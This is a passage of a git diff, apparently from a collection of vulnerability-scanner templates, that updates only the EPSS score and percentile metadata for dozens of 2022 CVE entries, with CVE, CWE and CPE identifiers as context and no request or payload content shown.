100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1398 cwe-id: CWE-918 epss-score: 0.48896 - epss-percentile: 0.97672 + epss-percentile: 0.97668 cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 70121896654..bd78af7526e 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1439 cwe-id: CWE-79 epss-score: 0.40599 - epss-percentile: 0.97236 + epss-percentile: 0.97234 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index 8a7520dd97d..4c9091a9555 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1574 cwe-id: CWE-352 epss-score: 0.73672 - epss-percentile: 0.98767 + epss-percentile: 0.98766 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 725bd70f3ff..c80364680bb 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.3 cve-id: CVE-2022-1580 cwe-id: CWE-639 - epss-score: 0.07418 - epss-percentile: 0.91484 + epss-score: 0.05992 + epss-percentile: 0.90402 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 502ec2472e6..3c577eacd3f 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1595 cwe-id: CWE-200 epss-score: 0.28971 - epss-percentile: 0.96421 + epss-percentile: 0.96425 cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 44de65edaa3..c25af07b0e1 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1597 cwe-id: CWE-79 epss-score: 0.33441 - epss-percentile: 0.96789 + epss-percentile: 0.96791 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index 09ea3086c86..a469e671ebd 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1598 cwe-id: CWE-306 epss-score: 0.25754 - epss-percentile: 0.96081 + epss-percentile: 0.96084 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 3f447de429b..610a25115bc 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1713 cwe-id: CWE-918 epss-score: 0.89884 - epss-percentile: 0.9955 + epss-percentile: 0.99552 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index 1087db9b037..be06ff91171 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1724 cwe-id: CWE-79 epss-score: 0.05224 - epss-percentile: 0.89641 + epss-percentile: 0.89637 cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index ac2e66608d8..fff256ce7ec 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1756 cwe-id: CWE-79 epss-score: 0.03183 - epss-percentile: 0.86589 + epss-percentile: 0.86588 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index b14b285ce4c..edb771b47d1 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 epss-score: 0.24873 - epss-percentile: 0.95975 + epss-percentile: 0.95979 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index 6452e001cff..eb383eec784 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1904 cwe-id: CWE-79 epss-score: 0.02188 - epss-percentile: 0.83948 + epss-percentile: 0.83942 cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index f8ce569d438..f44ae21a465 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1906 cwe-id: CWE-79 epss-score: 0.05846 - epss-percentile: 0.90264 + epss-percentile: 0.90266 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index a5b1ae78ee1..9eaefd1d7a9 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1916 cwe-id: CWE-79 epss-score: 0.04572 - epss-percentile: 0.8888 + epss-percentile: 0.88878 cpe: cpe:2.3:a:pluginus:woot:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 8c27694a611..fc2c53ccb7e 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1933 cwe-id: CWE-79 epss-score: 0.14451 - epss-percentile: 0.94228 + epss-percentile: 0.94225 cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 65e48201ddd..f84670941d9 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1946 cwe-id: CWE-79 epss-score: 0.00862 - epss-percentile: 0.74596 + epss-percentile: 0.74577 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1950.yaml b/http/cves/2022/CVE-2022-1950.yaml index def4c8fa5b0..3f576f84302 100644 --- a/http/cves/2022/CVE-2022-1950.yaml +++ b/http/cves/2022/CVE-2022-1950.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1950 cwe-id: CWE-89 epss-score: 0.57136 - epss-percentile: 0.9806 + epss-percentile: 0.98058 cpe: cpe:2.3:a:kainelabs:youzify:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index a65601ed382..32abc545311 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2034 cwe-id: CWE-639 epss-score: 0.33749 - epss-percentile: 0.96816 + epss-percentile: 0.96818 cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2130.yaml b/http/cves/2022/CVE-2022-2130.yaml index 046b9c3b5ff..476246cf767 100644 --- a/http/cves/2022/CVE-2022-2130.yaml +++ b/http/cves/2022/CVE-2022-2130.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2130 cwe-id: CWE-79 epss-score: 0.28139 - epss-percentile: 0.96331 + epss-percentile: 0.96333 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 87ffe578b79..d1cabaa2a52 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21500 epss-score: 0.93773 - epss-percentile: 0.99845 + epss-percentile: 0.99846 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 77fcd1da88e..b0796b59388 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-21661 cwe-id: CWE-89 epss-score: 0.90904 - epss-percentile: 0.99613 + epss-percentile: 0.9961 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2168.yaml b/http/cves/2022/CVE-2022-2168.yaml index 25280b98f46..a23aea3bd20 100644 --- a/http/cves/2022/CVE-2022-2168.yaml +++ b/http/cves/2022/CVE-2022-2168.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2168 cwe-id: CWE-79 epss-score: 0.00844 - epss-percentile: 0.74302 + epss-percentile: 0.74278 cpe: cpe:2.3:a:w3eden:download_manager:*:*:*:*:free:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index d65718fb580..5e0608c72ab 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-21705 cwe-id: CWE-74,NVD-CWE-Other epss-score: 0.7849 - epss-percentile: 0.98989 + epss-percentile: 0.98988 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index dcf3360b1f6..5a4c10869aa 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2174 cwe-id: CWE-79 epss-score: 0.22204 - epss-percentile: 0.95618 + epss-percentile: 0.95622 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 9318f283346..f717ea1352d 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2219 cwe-id: CWE-79 epss-score: 0.16573 - epss-percentile: 0.94703 + epss-percentile: 0.94701 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index ac962942498..07e8e51a4a2 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-22242 cwe-id: CWE-79 epss-score: 0.62134 - epss-percentile: 0.98289 + epss-percentile: 0.98288 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index cfc607834f4..6b50cdadf63 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-22733 cwe-id: CWE-200 epss-score: 0.86064 - epss-percentile: 0.99368 + epss-percentile: 0.9937 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 80ea8c02bf6..0cce439ffc6 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-22897 cwe-id: CWE-89 epss-score: 0.9012 - epss-percentile: 0.99567 + epss-percentile: 0.99566 cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 12a9eed89f4..c683db434db 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2290 cwe-id: CWE-79 epss-score: 0.074 - epss-percentile: 0.91473 + epss-percentile: 0.91471 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index 95a203de1b9..463dd065d65 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 - epss-score: 0.94461 - epss-percentile: 0.99994 + epss-score: 0.94485 + epss-percentile: 0.99998 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 48117e34bcb..9b3b5b03e89 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-22954 cwe-id: CWE-94 epss-score: 0.94444 - epss-percentile: 0.9999 + epss-percentile: 0.99988 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 208a60a408b..e13efc84aa9 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2022-22963 cwe-id: CWE-94,CWE-917 epss-score: 0.94462 - epss-percentile: 0.99994 + epss-percentile: 0.99993 cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index a4fe852e02f..555bbb8d532 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 - epss-score: 0.94441 - epss-percentile: 0.99989 + epss-score: 0.94428 + epss-percentile: 0.99981 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index b87969d1b54..edda33e9bf1 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-22972 cwe-id: CWE-287 epss-score: 0.93647 - epss-percentile: 0.99831 + epss-percentile: 0.99833 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 24f0d43e9a2..de6d144a7c5 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-23102 cwe-id: CWE-601 epss-score: 0.04852 - epss-percentile: 0.89232 + epss-percentile: 0.89229 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index 8856a29cfbc..305b6e4d714 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.93636 - epss-percentile: 0.99828 + epss-percentile: 0.9983 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 6ebe3f029d9..867fc8ad02a 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-23348 cwe-id: CWE-916 epss-score: 0.00828 - epss-percentile: 0.74029 + epss-percentile: 0.74004 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23397.yaml b/http/cves/2022/CVE-2022-23397.yaml index 2e6b756423d..b0569567054 100644 --- a/http/cves/2022/CVE-2022-23397.yaml +++ b/http/cves/2022/CVE-2022-23397.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23397 cwe-id: CWE-79 epss-score: 0.02099 - epss-percentile: 0.83617 + epss-percentile: 0.83613 cpe: cpe:2.3:a:cedargate:ez-net_portal:6.5.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 6dec3abbf7c..90b7f3e423d 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 epss-score: 0.23569 - epss-percentile: 0.95801 + epss-percentile: 0.95806 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index 6da02c98802..bd2a6fa243a 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2373 cwe-id: CWE-862 epss-score: 0.08392 - epss-percentile: 0.92045 + epss-percentile: 0.92041 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 0a4ffff08a7..26c2b5a1c82 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2376 cwe-id: CWE-862 epss-score: 0.10489 - epss-percentile: 0.9303 + epss-percentile: 0.93023 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 80da1762654..3533c4b4fba 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23779 cwe-id: CWE-200 - epss-score: 0.46707 - epss-percentile: 0.97567 + epss-score: 0.7766 + epss-percentile: 0.98945 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index e5da1afe3ac..40c08d28482 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23808 cwe-id: CWE-79 epss-score: 0.68413 - epss-percentile: 0.98548 + epss-percentile: 0.98551 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index e2fb33a5cf2..24a19642a05 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23881 cwe-id: CWE-77 epss-score: 0.86657 - epss-percentile: 0.99394 + epss-percentile: 0.99397 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index a9ba038e2ba..a6dafc7de01 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-23898 cwe-id: CWE-89 epss-score: 0.82815 - epss-percentile: 0.99219 + epss-percentile: 0.99218 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24086.yaml b/http/cves/2022/CVE-2022-24086.yaml index 9d64a21e895..6f97feed7fa 100644 --- a/http/cves/2022/CVE-2022-24086.yaml +++ b/http/cves/2022/CVE-2022-24086.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24086 epss-score: 0.93778 - epss-percentile: 0.99846 + epss-percentile: 0.99848 cwe-id: CWE-20 cpe: cpe:2.3:a:adobe:commerce:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 12cb0024f56..60c60b8e04e 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-24124 cwe-id: CWE-89 epss-score: 0.57377 - epss-percentile: 0.9807 + epss-percentile: 0.98069 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index 718da4444d8..74077d3adea 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-24129 cwe-id: CWE-918 epss-score: 0.2188 - epss-percentile: 0.95578 + epss-percentile: 0.95583 cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 4d94714c34c..a46cdba1248 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-24223 cwe-id: CWE-89 epss-score: 0.65106 - epss-percentile: 0.98412 + epss-percentile: 0.98414 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index cd787480815..5c23cf36fb8 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-24265 cwe-id: CWE-89 epss-score: 0.54717 - epss-percentile: 0.97953 + epss-percentile: 0.97951 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index bf0aa99611e..4a9f964d826 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.51084 - epss-percentile: 0.97779 + epss-percentile: 0.97775 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2461.yaml b/http/cves/2022/CVE-2022-2461.yaml index 65b25ad30bc..18f0b17079d 100644 --- a/http/cves/2022/CVE-2022-2461.yaml +++ b/http/cves/2022/CVE-2022-2461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2461 cwe-id: CWE-862 epss-score: 0.13263 - epss-percentile: 0.93938 + epss-percentile: 0.93934 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index c62ad4f1e77..4cf08e2319d 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2462 cwe-id: CWE-200 epss-score: 0.04027 - epss-percentile: 0.88156 + epss-percentile: 0.88158 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 07bb06cd0c7..41389ff8839 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-24627 cwe-id: CWE-89 epss-score: 0.49889 - epss-percentile: 0.97724 + epss-percentile: 0.97719 cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 2fe0fa48c8a..e2cb93cc368 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-24681 cwe-id: CWE-79 epss-score: 0.23412 - epss-percentile: 0.95783 + epss-percentile: 0.95787 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24819.yaml b/http/cves/2022/CVE-2022-24819.yaml index cea9a38cd4f..31cda522635 100644 --- a/http/cves/2022/CVE-2022-24819.yaml +++ b/http/cves/2022/CVE-2022-24819.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-24819 cwe-id: CWE-359 epss-score: 0.04317 - epss-percentile: 0.88556 + epss-percentile: 0.88555 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 1184455037b..5413a97f4d2 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2486 cwe-id: CWE-78 epss-score: 0.92316 - epss-percentile: 0.99709 + epss-percentile: 0.99708 cpe: cpe:2.3:h:wavlink:wl-wn535k2:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 22ceaa9f00a..dd92588d46b 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -22,7 +22,7 @@ info: cve-id: 